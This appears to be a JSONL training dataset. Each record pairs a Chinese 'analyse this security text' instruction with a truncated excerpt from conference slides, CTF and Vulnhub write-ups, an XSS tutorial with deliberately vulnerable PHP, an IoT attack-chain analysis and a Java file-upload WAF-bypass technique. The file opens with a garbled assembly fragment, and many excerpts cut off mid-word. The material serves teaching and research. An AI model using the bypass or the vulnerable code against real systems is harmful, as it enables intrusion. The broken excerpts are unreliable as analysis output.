!!!!B!.!L8! .!L4!:! !!!!LDR!r0!,!<!string_2_address!>! !!!!BL!prin]! .!L8!:! CMP!r1!,!#0! LDRNE!r0!,!<!string_1_address!>! LDREQ!r0!,!<!string_2_address!>! BL!prin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStealing Profits from Stock Market Spammers Defcon 17 - Grant Jordan - 7/31/09  Copyright 2008, The NASDAQ OMX Group, Inc. or: How I Learned to Stop Worrying and Love the Spam Who were we?  Grant Jordan & Kyle Vogt  MIT students with too much free time  Lots of ridiculous projects  like safe cracking. Who are we NOT?  Stock Market Experts  Spammers  Get Rich Quick Scammers Spoiler Alert:  Everything will be seen through a soda straw.  Its all from our point of view at the time.  We couldnt see the forces behind anything.  Lots of guesses. Lots of hypotheticals.  Moral of the story: A lot can be determined without the underlying information. Its all about how you look at the information that everyone already has. How it all started October 2006  Kyle: There must be a way to make money off all this spam trying to sell stocks!  Grant: Youre an idiot. Why Kyle must have been wrong  Profit is derived from asymmetric information.  I know something that you dont!  If everyone knows, its already priced-in.  But everyone gets the spam!  What do we know that others dont? But first What is this spam trying to do? Anatomy of a Pump and Dump Fear and Greed in the 24-hour Economy  Richard Minsky Anatomy of a Pump and Dump Fear and Greed in the 24-hour Economy  Richard Minsky 1) I own 100 shares of Worthless, Inc. @ $1 per share Anatomy of a Pump and Dump Fear and Greed in the 24-hour Economy  Richard Minsky 2) I go on message boards and tell everyone the stock is about to go THROUGH THE ROOF!!!1 Anatomy of a Pump and Dump Fear and Greed in the 24-hour Economy  Richard Minsky 3) People go buy the stock Anatomy of a Pump and Dump Fear and Greed in the 24-hour Economy  Richard Minsky 4) Price goes up with increased demand. I sell all my shares @ $2 (Profit!) Anatomy of a Pump and Dump Fear and Greed in the 24-hour Economy  Richard Minsky 5) Surge of demand was artificial. There are no new buyers. People try to sell but cant! Anatomy of a Pump and Dump Fear and Greed in the 24-hour E", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 4-Base64 --- 目标 T4.exe 使用 IDA 打开,找 main 函数,并做基本的分析重命名函数 这次在17行出现了一个 sub_455A94 函数,双击进去 这个 sub_455A94 对 sub_45A3F0 做了一层封装,继续双击跟进下一级 这里可以看到 sub_45A3F0 的细节寻找关键数字常量比如多次引用到 off_529000 全局资源 双击进入 off_529000跳转到该资源存储的位置 这里可以看到 off_529000 dd offset aAbcdefghijklmn 表示 off_529000 是一个全局的指针变量保存了一个字符串的指针指向的字符串为 aAbcdefghijklmn  双击进入 aAbcdefghijklmn 地址的数据处 发现一个关键字符串 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 去搜索一下就知道这个估计是 base64 编码的函数 重命名一下 在分析下思路 输入值 --> 每个字符与i异或 --> 进行base64 编码 --> 与 Zm1jZH9cSVJXT0NFSFJHW09ZU1tVaA== 比较 那么解题就是将 Zm1jZH9cSVJXT0NFSFJHW09ZU1tVaA== 解 base64与 i 异或即可 这里用 cyberchef 快速得到格式化的 16 进制值 然后用之前的与 i 异或脚本跑下即可 --- **Source & Reference** - [萌新学逆向T4 Base64算法](https://mp.weixin.qq.com/s/HUE8DE-K4n0NytzrO4I49A)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSleight of Mind Magic and Social Engineering Mike Murray Tyler Reguly 1 A DANGEROUS OPENER Credit: Luke Jermay 2 EXPLANATION 3 THE FORCE IS WITH YOU 4 EXPLANATION 5 COIN BENDING Credit: Luke Jermay 6 EXPLANATION 7 EQUIVOQUE Credit: Luke Jermay 8 EXPLANATION 9 IN THE CARDS 10 EXPLANATION 11 RGM Credit: Luke Jermay 12 EXPLANATION 13 QUESTIONS? Email Us: mmurray@episteme.ca ht@computerdefense.org 14", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目录 Vulnhub渗透测试练习一-------------------------------Breach1.0 Vulnhub渗透测试练习二 ------------------------------Billu_b0x Vulnhub渗透测试练习三 -------------------------------Bulldog1 Vulnhub渗透测试练习四---------------------------------Acid Vulnhub渗透测试练习五---------------------------------LazysysAdmin-1 Vulnhub渗透测试练习六---------------------------------Freshly Vulnhub渗透测试练习七---------------------------------FristiLeaks v1.3 Vulnhub渗透测试练习八---------------------------------The Ether Vulnhub渗透测试练习九---------------------------------zico2 Vulnhub渗透测试练习十---------------------------------Quaoar Vulnhub渗透测试练习十一---------------------------------SickOs 1.1 Vulnhub渗透测试练习十二---------------------------------BSides-Vancouver-2018- Workshop Vulnhub渗透测试练习十三---------------------------------Kioptrix 1 Vulnhub渗透测试练习十四----------------------------------Zico2 Vulnhub渗透测试练习十五----------------------------------Kioptrix 3 Vulnhub渗透测试练习十六----------------------------------Kioptrix 4 Vulnhub靶场题解 - 红日安全团队 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台供安全爱好者学习渗透使用大部分环境是做好的虚拟机镜像文 件镜像预先设计了多种漏洞需要使用VMware或者VirtualBox运行每个镜像会有破解的目标大多是 Boot2root从启动虚机到获取操作系统的root权限和查看flag网址https://www.vulnhub.com 第一节 Breach1.0 靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战 VM虚机配置有静态IP地址192.168.110.140需要将虚拟机网卡设置为host-only方式组网非常感谢 Knightmare和rastamouse进行测试和提供反馈作者期待大家写出文章特别是通过非预期的方式获取root权 限 目标 Boot to root获得root权限查看flag 运行环境 靶机网络连接方式设置为主机模式host-only静态IP是192.168.110.140 攻击机同网段下有Windows攻击机物理机IP地址192.168.110.220安装有NmapBurpsuit WiresharkSqlmapncPython2.7JDKDirBusterAWVSNessus等渗透工具也可以使用Kali Linux攻击机 信息收集 端口服务识别 启动Breach1.0虚拟机由于IP已知使用nmap扫描端口并做服务识别和深度扫描加-A参数扫描结果保存 到txt文件命令 nmap -v -A 192.168.110.140 -oN Breach.txt 发现端口几乎全开放了显然是有问题虚拟机对端口扫描做了一些防护措施直接访问80端口进入web首 页 http://192.168.110.140/ 漏洞挖掘 0x01查看首页源码解码得到密码 (1) 查看首页源码发现提示 Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo 这是一串 base64编码 (2) 将其复制到Burpsuit Decoder进行base64解码解密后发现还是base64编码继续base64解码得到 pgibbons:damnitfeel$goodtobeagang$ta 0x02登录cms查看邮件下载包含SSL证书", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Pwn1 Pwn, 227 points ## Description: A binary file was attached, in addition to an address and port. ## Solution: Let's run the binary: ```console root@kali:/media/sf_CTFs/tamu/Pwn1# ./pwn1 Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? test I don't know that! Auuuuuuuugh! ``` So we need to answer the question in order to proceed. The first place to search for an answer is `strings`: ```console root@kali:/media/sf_CTFs/tamu/Pwn1# strings pwn1 [...] Right. Off you go. flag.txt Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? Sir Lancelot of Camelot I don't know that! Auuuuuuuugh! What... is your quest? To seek the Holy Grail. What... is my secret? [...] ``` `Sir Lancelot of Camelot` seems like a reasonable response. ```console root@kali:/media/sf_CTFs/tamu/Pwn1# echo \"Sir Lancelot of Camelot\" | ./pwn1 Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? What... is your quest? I don't know that! Auuuuuuuugh! ``` So we moved past the first question, new we are requested to provide a quest. `To seek the Holy Grail.` makes most sense, given the strings in the binary: ```console root@kali:/media/sf_CTFs/tamu/Pwn1# { echo \"Sir Lancelot of Camelot\"; echo \"To seek the Holy Grail.\"; } | ./pwn1 Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? What... is your quest? What... is my secret? I don't know that! Auuuuuuuugh! ``` So far, so good. But what is the secret? Looks like we'll have to open the binary with a disassembler after all: ``` root@kali:/media/sf_CTFs/tamu/Pwn1# r2 pwn1 -- R2 loves everyone, even Java coders, but less than others [0x000005c0]> aaa [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Russian threesome, re, 5 solves, 500p > Interested in the hot secret hidden in my basement? That's right, it's stored on this old computer. Unfortunately it stopped working a long time ago. However I've got an emulator that simulates this machine and I even was able to dump it's magnetic drum into a file. I'm sure that way extracting the juicy data should be easy, right? As the description stated, we got two files: a compiled emulator and image of a magnetic drum. Reversing the emulator was the first part of the challenge. As it turns out, the emulated architecture is pretty interesting. It uses balanced ternary encoding for everything, organized into 9-trit mini-words (\"trytes\"), two of which make a word. There are 27 words in a sector. The whole drum is composed of 36 sectors. The machine contains a few registers and memory objects: - sectors X, Y, Z - three of drum sectors can be loaded into memory at the same time, - accumulator (A), used generally as tryte-sized object, - secondary accumulator (B), used for multiplication etc. - program counter (PC), five-trit sized (selects X/Y/Z, one of 27 words, one of trytes; must not have -1 as LSB) - flag (F), one trit of last operation sign - indirection register (V), five-trit sized Program counter always increments after the instruction, even if it was a jump (so jump target is actually one after what is encoded). All instructions are tryte-sized and have the same composition: 3-trit opcode, 5-trit immediate, 1-trit indirection flag. If indirection flag is non-zero, the indirection register is added to immediate field. This behavior allows for indirect indexing, for example `A = [V+20]` (other than by using V, all instructions use constant addresses). The machine has a few allowances for IO: audio (interprets X/Y/Z as speaker tones), puts and gets (reads or writes string into X/Y/Z). The machine has specific charset, where bytes lower than 128 are ASCII and 128-255 are custom Russian characters. There is quite a few ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCunning with CNG: Soliciting Secrets from Schannel DEF COn 24 1470502800 Why do you care? Ability to decrypt Schannel TLS connections that use ephemeral key exchanges Ability to decrypt and extract private certificate and session ticket key directly from memory Public Cert/SNI to PID/Logon Session Mapping What you get out of this talk Agenda A very short SSL/TLS Review A background on Schannel & CNG The Secret Data The Forensic Context Demo >.> DisclaimeR This is NOT an exploit Its just the spec :D and some implementation specific oddities Microsoft has done nothing [especially] wrong To the contrary, their documentation was actually pretty great Windows doesnt track sessions for processes that load their own TLS libs Im looking at you Firefox and Chrome Windows doesnt track sessions for process that dont use TLS Thatd be you TeamViewer... BackgroUnd TLS, Schannel, and CNG The now infamous TLS Handshake [ Initial Connection ] E.G.: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 The now infamous TLS Handshake or, Session Resumption PeRFect FoRWaRd Secrecy What we want to do One time use keys, no sending secrets! What TLS actually does Caches values to enable resumption recommends `An upper limit of 24 hours is suggested for session ID lifetimes` When using session ticket extension, sends the encrypted state over the network basically returning to the issue with RSA, but using a more ephemeral key... What implementations also do Store symmetric key schedules (so you can find the otherwise random keys...) Cache ephemeral keys and reuse for a while... YEAR: 1992 CLASS: HUMAN ID: WHITFIELD DIFFIE EVENT: AUTHENTICATION AND AUTHENTICATED KEY EXCHANGES Schannel & CNG Secure Channel Its TLS -> the Secure Channel for Windows! A library that gets loaded into the key isolation process and the client process Technically a Security Support Provider (SSP) Spoiler: the Key Isolation process is LSASS The CryptoAPI-Next Generation (CNG) Introduced in Vista (yes you read correctly) Provides Co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRobots with lasers and cameras (but no security): Liberating your vacuum from the cloud DEFCON 29  Dennis Giese (08.08.2021) DEFCON 29  Dennis Giese 2 About me  PhD student at Northeastern University, USA  Working with Prof. Guevara Noubir @Khoury  Research field: Wireless and embedded security&privacy  Interests: Reverse engineering of interesting devices  Smart Home Devices, mostly vacuum cleaning robots  Current research: Smart Speakers (08.08.2021) DEFCON 29  Dennis Giese 3 Most recent work  Amazon Echo Dot or the reverberating secrets of IoT devices  Authors: Dennis Giese and Guevara Noubir  Published: ACM WiSec 2021 https://dontvacuum.me/papers/ACMWisec-2021/ (08.08.2021) DEFCON 29  Dennis Giese 4 Goals  Get an overview over the development of vacuum robots  Focus: Roborock and Dreame  Learn about vulnerabilities and backdoors  Understand methods to root current robots https://www.dreame-technology.com/ https://www.roborock.com Side note: Generally, a friendly relationship with vendors is maintained (08.08.2021) DEFCON 29  Dennis Giese 5 MOTIVATION (08.08.2021) DEFCON 29  Dennis Giese 6 Why do we want to root devices?  Play with cool hardware  Stop devices from constantly phoning home  Use custom Smart Home Software  Verification of privacy claims (08.08.2021) DEFCON 29  Dennis Giese 7 Why do we not trust IoT?  Devices are connected to the home network  Communication to the cloud is encrypted, content unclear  Developing secure hardware and software is hard  Vendor claims contradict each other (08.08.2021) DEFCON 29  Dennis Giese 8 Nothing is sent to the cloud? https://global.roborock.com/pages/roborock-s6-maxv (08.08.2021) DEFCON 29  Dennis Giese 9  but you can access the camera? https://global.roborock.com/pages/roborock-s6-maxv (08.08.2021) DEFCON 29  Dennis Giese 10 Problem of used devices  Used devices might be problematic  Previous owner installed rootkit  New owner cannot verify software  Result: Device might behave maliciously in your network  Rooting ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking TrustZone-M PRIVILEGE ESCALATION ON LPC55S69 What are two firmware engineers doing at DEFCON? Designing hardware Root of Trust for Oxide Computer Company In-house, microkernel OS written in Rust Leverage publicly-available, security-focused microcontroller Plan to open-source everything by time product ships Design goals A strong assertion regarding the integrity and authenticity of RoT firmware and hardware configuration A tamper-resistant, impersonation-resistant unique ID A mechanism for extending trust to additional devices A mechanism for re-establishing trust after a compromise Due diligence on candidate microcontrollers led to surprising findings 1 2 3 4 1 2 3 OXIDE BREAKING TRUSTZONE-M NXP LPC55S69 OXIDE BREAKING TRUSTZONE-M OXIDE BREAKING TRUSTZONE-M NPX LPC55S69  Dual-core Cortex-M33   CPU0 has TZ-M and MPU CPU1 is wrapped with MSW     AES, SHA, and GF(p) accelerators SRAM-based PUF w/ protected key path to AES accelerator Secure boot (RSA-2048 or RSA-4096) Debug Authentication (RSA-2048 or RSA-4096) OXIDE Is this microcontroller actually secure   Why should we believe what the marketing says? Documentation was frequently unclear and confusing BREAKING TRUSTZONE-M OXIDE BREAKING TRUSTZONE-M FROM UM11126 OXIDE BREAKING TRUSTZONE-M FROM AN12283 OXIDE Undocumented Features  EZH     From AN12868 Custom core with single-cycle I/O access Intended for wire protocol conversions NXP only acknowledges existence to high-volume customers  DICE CDI computation  ROM patch controller  Defeaturized by (partially) removing details from documentation BREAKING TRUSTZONE-M OXIDE BREAKING TRUSTZONE-M Undocumented Features  EZH     From AN12868 Custom core with single-cycle I/O access Intended for wire protocol conversions NXP only acknowledges existence to high-volume customers  DICE CDI computation  ROM patch controller  Defeaturized by (partially) removing details from documentation TrustZone-M 101 OXIDE BREAKING TRUSTZONE-M OXIDE What is TrustZone-M? The Armv8-M ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n4.2 Manual Strategic Cyber LLC (A HelpSystems Company) www.cobaltstrike.com/ / 2/ Table of Contents Table&of&Contents&..................................................................................................................................&2/ 1.&Welcome&to&Cobalt&Strike&..............................................................................................................&6/ 1.1#What#is#Cobalt#Strike?#............................................................................................................................#6/ 1.2#Installation#and#Updates#.......................................................................................................................#7/ System'Requirements'...................................................................................................................................................'7/ Run'the'update'program'............................................................................................................................................'7/ 1.3#The#Team#Server#......................................................................................................................................#8/ 1.4#Cobalt#Strike#Client#.................................................................................................................................#9/ 1.5#Distributed#and#Team#Operations#...................................................................................................#10/ 1.6#Scripting#Cobalt#Strike#.........................................................................................................................#11/ 2.&User&Interface&.................................................................................................................................&12/ 2.1#Overview#...................................................................................................................................................#12/ 2.2#Toolbar#......................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n考勤机的管理方式 本 地 管 理 局 域 网 管 理 互 联 网 管 理 星耀实验室是斗象科技网络安全发展战略的重要组成 星耀之名取自山海经中的星耀独角兽实验室专 注于前沿创新的安全技术的研究覆盖包括红蓝对抗 漏洞挖掘IoT及移动安全等各安全细分领域通过研 究积累和内部研发为公司安全能力支撑保驾护航 设备的外部通信 从简化后的通信架构来看我们对设备的漏洞 挖掘可以从设备与云端的通信以及设备与用 户的通信这两方面入手 流量分析 设备启动后会主动连接到 tls.*****.com 但是没有校验 服务器的证书 流量分析 设备=>云端 云端=>设备 设备向云端上传了自身的信息 包括固件版本和操作系统类型 云端返回的数据中包含了大 量不明意义的二进制数据 设备采用了FreeRTOS系统首先考虑植入恶意固件 但是修改这里的固件版本无法触发OTA 继续分析设备与云端的通信意义不大 BLE通信分析 移动端 (Android) App Log 开启ADB即可获 取日志 需要App打印BLE通信 相关Log Hook关键API Hook系统关键 API即可通用 性强 需要熟悉移动安全相 关知识 通信信道 空口嗅探 硬件软件都有现 成的解决方案 无法处理加密通信 设备端 调试设备 无奈之选 需要分析固件并开 启设备调试接口 BLE通信分析 针对本考勤机的情况最简单的方法是 直接嗅探通信通信内容均以明文传输 通过分析可以知道通信数据的大体结构 BLE通信分析 用户在App中可以执行的操作与设备可以执行的命令对应关系如下 激活/绑定 getActiveInfo -> getWifiInfo -> connectWifi -> active 切换WiFi getWifiInfo -> handshake -> connectWifi 重置设备 resetDevice 获取设备状态 getActiveInfo 获取设备扫描的WiFi列表 getWifiInfo 控制设备连接到指定WiFi connectWifi 通知设备进行绑定操作 active 握手命令用于身份认证 handshake 重置设备 resetDevice 重置设备时没有使用handshake进行身份认证 所以通过BLE通信可以未授权重置设备 一点小插曲 实际上我们是通过调试设备来获取BLE通信数据的 MCU提供了SDK及 示例代码可以 用来分析BLE协议 栈的使用方式 示例代码中有一部分日志这些字符串 在固件中同样也出现了通过交叉引用 可以确定固件中BLE协议栈的相关代码 一点小插曲 一点小插曲 使用gdb调试脚本在关键代码处下断点 并以hexdump的形式输出BLE通信数据 至此我们发现可以在不需要任何前置条件的情况下进行中间人攻击 未授权重置 设备 未校验TLS 证书  劫持设备连接到指 定WiFi 那么控制了云端与设备之间的通信后有何危害 要解答这个问题需要先对设备固件进行分析 MITM篡改通 信数据 拆解设备 PCF8563 RTC芯片 GD25Q128 128M-bit Flash芯片 ESP32 MCUxtensa架构 ESP32 GD25Q128 PCF8563 UART 拆解设备 ESP32需要Flash遵守固定的分区格式[1] 结合串口打印的数据提取ota_0分区 使用IDA加载ota_0分区[2] 拆解设备 TDI TDO TCLK TMS GND VDD 可以使用JTAG调试 ESP32[3]但是会在执行 到某一条命令后中断 拆解设备 多次尝试后发现I2C接口初始化 完成后就会中断JTAG调试 由芯片手册可以发现JTAG接口的TDO 引脚可以复用作I2C的SDA引脚 PCF8563芯片使 用了I2C接口 跳过I2C初始化之后设备可以正常调试但是 获取不到正确的日期时间 准备工作完成可以开始分析固件了 分析固件 从字符串入手逆向OTA流程 分析固件 被动等待设备进行OTA 查询耗时太长 故考虑通过调试触发 OTA更新 OTA查询请求每隔一小时触发一次 分析固件 通过调试触发OTA流程 由atmStateSync请求查询云端是否有新版本固件 (1)设备发送给云端的的设备固件版本号 (2)云端最新的固件版本 (3)OTA镜像的URL (4)OTA镜像的MD5校验 (1) (2) (3) (4) 分析固件 启动固件更新需要两个条件满足其一 分析固件 通过HTTP请求获取固件 HTTP Response Header中需包含OTA镜像长度MD5校验值 和Content-Type 分析固件 通过MD5检查后还需要检查OTA镜像的hash值 检查通过后镜像会被写入OTA分区 分析固件 启动时bootloader读取OTA分区并进行校验 利用设备的OTA功能 我们有了一条完整的漏洞链", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBetrayed by the keyboard How what you type can give you away Matt Wixey Research Lead, PwC UK Cyber Security www.pwc.com Building a secure digital society. PwC  2 Disclaimer  This content is presented for educational purposes only  What this presentation isnt PwC  3 Introduction Matt Wixey  Research Lead for the Cyber Security BU  Work on the Ethical Hacking team  PhD student at UCL  Previously worked in LEA doing technical R&D PwC  4 Why this talk?  Based on some research I did at UCL  Interest in side-channel attacks  Humans have side-channels too  Previous work on forensic linguistics  First degree = English Literature and Language PwC  5 Agenda  What is attribution?  Problems  Case Linkage Analysis  Experimentation  Results  Implications  Summary PwC  6 What is attribution?  Why would we want to do it?  Benefits  Types  Approaches PwC  7 What is attribution?  Identifying an attackers location?  Hunker et al, 2008; Wheeler and Larsen, 2003  Identify the country or organisation behind an attack?  Rid and Buchanan, 2014  Determining who is responsible for a hostile cyber act?  Mejia, 2014  We must find a person, not a machine  Clark and Landau, 2011 PwC  8 Benefits of attribution  Deterring future attacks  Improving defences  Interrupting and disrupting attacks (Hunker et al, 2008)  Does attribution actually lead to deterrence? (Guitton, 2012)  Regardless, attribution is a desirable outcome (depending on which side youre on!) PwC  9 Types of attribution  Hutchins et al, 2011: Atomic Computed Behavioural PwC  10 Problems with attribution  Hiding atomic IOCs  Issues with computed IOCs  Lack of tangible benefits from behavioural IOCs PwC  11 Hiding atomic IOCs  These are the most effective identifiers  Easy to resolve (usually)  But also easiest to spoof/anonymise/obfuscate PwC  12 Issues with computed IOCs  Changes to malware make it harder  Other methods:  Correlating activity with office hours in timezones (Rid & Buchanan, 2014; CloudHopper, 2017)  Deanonymising de", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# XSS ## XSS 简介 跨站脚本Cross-Site ScriptingXSS是一种经常出现在 WEB 应用程序中的计算机安全漏洞是由于 WEB 应用程序对用户的输入过滤不足而产生的攻击者利用网站漏洞把恶意的脚本代码注入到网页中当其他用户浏览这些网页时就会执行其中的恶意代码对受害用户可能采取 Cookies 资料窃取会话劫持钓鱼欺骗等各种攻击 ### 反射型 XSS 反射型跨站脚本Reflected Cross-Site Scripting是最常见也是使用最广的一种可将恶意脚本附加到 URL 地址的参数中 反射型 XSS 的利用一般是攻击者通过特定手法如电子邮件诱使用户去访问一个包含恶意代码的 URL当受害者点击这些专门设计的链接的时候恶意代码会直接在受害者主机上的浏览器执行此类 XSS 通常出现在网站的搜索栏用户登录口等地方常用来窃取客户端 Cookies 或进行钓鱼欺骗 服务器端代码 ```php <?php // Is there any input? if( array_key_exists( \"name\", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> ``` 可以看到代码直接引用了 `name` 参数并没有做任何的过滤和检查存在明显的 XSS 漏洞 ### 持久型 XSS 持久型跨站脚本Persistent Cross-Site Scripting也等同于存储型跨站脚本Stored Cross-Site Scripting 此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本攻击者事先将恶意代码上传或储存到漏洞服务器中只要受害者浏览包含此恶意代码的页面就会执行恶意代码持久型 XSS 一般出现在网站留言评论博客日志等交互处恶意脚本存储到客户端或者服务端的数据库中 服务器端代码 ```php <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = mysql_real_escape_string( $message ); // Sanitize name input $name = mysql_real_escape_string( $name ); // Update database $query = \"INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );\"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); //mysql_close(); } ?> ``` 代码只对一些空白符特殊符号反斜杠进行了删除或转义没有做 XSS 的过滤和检查且存储在数据库中明显存在存储型 XSS 漏洞 ### DOM XSS 传统的 XSS 漏洞一般出现在服务器端代码中而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞所以受客户端浏览器的脚本代码所影响客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型因此能够决定用于加载当前页面的 URL换句话说客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容它不依赖于服务器端的数据而从客户端获得 DOM 中的数据如从 URL 中提取数据并在本地执行另一方面浏览器用户可以操纵 DOM 中的一些对象例如 URLlocation 等用户在客户端输入的数据如果包含了恶意 JavaScript 脚本而这些脚本没有经过适当的过滤和消毒那么应用程序就可能受到基于 DOM 的 XSS 攻击 HTML 代码 ```html <html> <head> <title>DOM-XSS test</title> </head> <body> <script> var a=document.URL; document.write(a.substring(a.indexOf(\"a=\")+2,a.length)); </script> </body> </html> ``` 将代码保存在 domXSS.html 中浏览器访问 ``` ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Analysis of the State of Electron Security in the Wild Bachelors Thesis Benjamin Altpeter August 1, 2020 supervised by Prof. Dr. Martin Johns Declaration of Authorship I hereby declare that the thesis submitted is my own unaided work. All direct or indirect sources used are acknowledged as references. I am aware that the thesis in digital form can be examined for the use of unauthorized aid and in order to determine whether the thesis as a whole or parts incorporated in it may be deemed as plagiarism. For the comparison of my work with existing sources I agree that it shall be entered in a database. Further rights of reproduction and usage, however, are not granted here. This paper was not previously presented to another examination board and has not been published. Braunschweig, on August 1, 2020 Benjamin Altpeter Contents 1. Introduction 6 2. Background 8 2.1. Electron Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 2.2. A Basic App . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 3. Electron Attack Vectors 11 3.1. Attack Vectors Shared with Web Applications . . . . . . . . . . . . . . . . . . . . . . . . . . 11 3.1.1. OWASP Top Ten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 3.1.2. Additional Attack Vectors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 3.2. Attack Vectors Specific to Electron . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 3.2.1. Not Enabling Security Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 3.2.2. Opening URLs with shell.openExternal() . . . . . . . . . . . . . . . . . . . . . . . . 20 3.2.3. Missing Permission Request Handlers . . . . . . . . . . . . . . . . . . . . . . . . . . 21 3.2.4. Insecure Protocol Handlers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 3.2.5. Introducing Privileged APIs to the Window Object . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker Java件上传杀器-绕waf(针对commons- fileupload组件) 来个中的标题哈哈哈灵感来源于昨晚赛博群有个师傅@我是killer发了篇新章在那 篇章当中提到了在 filename=\"1.jsp\" 的filename字符左右可以加上些空字符 %20 %09 %0a %0b %0c %0d %1c %1d %1e %1f 如 %20filename%0a=\"1.jsp\"(直接 url编码为了区别) 这样导致waf匹配不到我们上传件 名我们上传依然可以解析我对 次进了更深的研究也是对师傅章对次补充下为了衔接还是先梳理遍看过 赛博群的师傅可以先跳过前的部分直接看最后部分(毕竟我想发个博客) 上传代码 针对使commons-fileupload处理件上传 public class TestServlet extends HttpServlet { public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException { String path = \"/Users/y4tacker/Desktop/JavaStudy/testtest\"; try { ServletFileUpload servletFileUpload = new ServletFileUpload(new DiskFileItemFactory()); servletFileUpload.setHeaderEncoding(\"UTF-8\"); List<FileItem> fileItems = servletFileUpload.parseRequest(request); for (FileItem fileItem : fileItems) { response.getWriter().write(fileItem.getName()); fileItem.write(new File(path+\"/\"+fileItem.getName())); 前置分析 将断点打在 servletFileUpload.parseRequest(request) ,跟 getItemIterator 直往下 到 org.apache.commons.fileupload.FileUploadBase.FileItemIteratorImpl#File ItemIteratorImpl Content-Type 要开头为 multipart/ } }catch (Exception e){ } } } 接下来对流的处理部分忽略到下有个 this.boundary = FileUploadBase.this.getBoundary(contentType); ,因为件上传的格式就是,可以猜 出这就是解析这部分 当时师傅跳过中间些部分到了 org.apache.commons.fileupload.FileUploadBase#getFileName(java.lang.Strin g) 在 parser.parse(pContentDisposition, ';'); 简单说下作是先分号将 form- data; name=\"file\"; filename=\"1.jsp\" 分割然后获取 等于号前的值这我们看看 到getToken当中的栈便家调试 ------WebKitFormBoundaryTyBDoKvamN58lcEw Content-Disposition: form-data; name=\"filename\"; filename=\"1.jsp\" 233 ------WebKitFormBoundaryTyBDoKvamN58lcEw-- 这有个到 Character.isWhitespace 也就是@我是killer师傅提到的点也是我们开篇 前中说到的利式就不多提了 正开启 看看 getFileName 调前其实传了个 headers 这个 headers 来源于上的 this.multi getToken:99, ParameterParser (org.apache.commons.fileupload) parseToken:162, ParameterParser (org.apache.commons.fileupload) parse:311, ParameterParser (org.apache.commons.fileupload) parse:279, ParameterParser (org.apache.commons.fileupload) parse:262, ParameterParse", "category": "text_analysis", "source": "security_papers"}
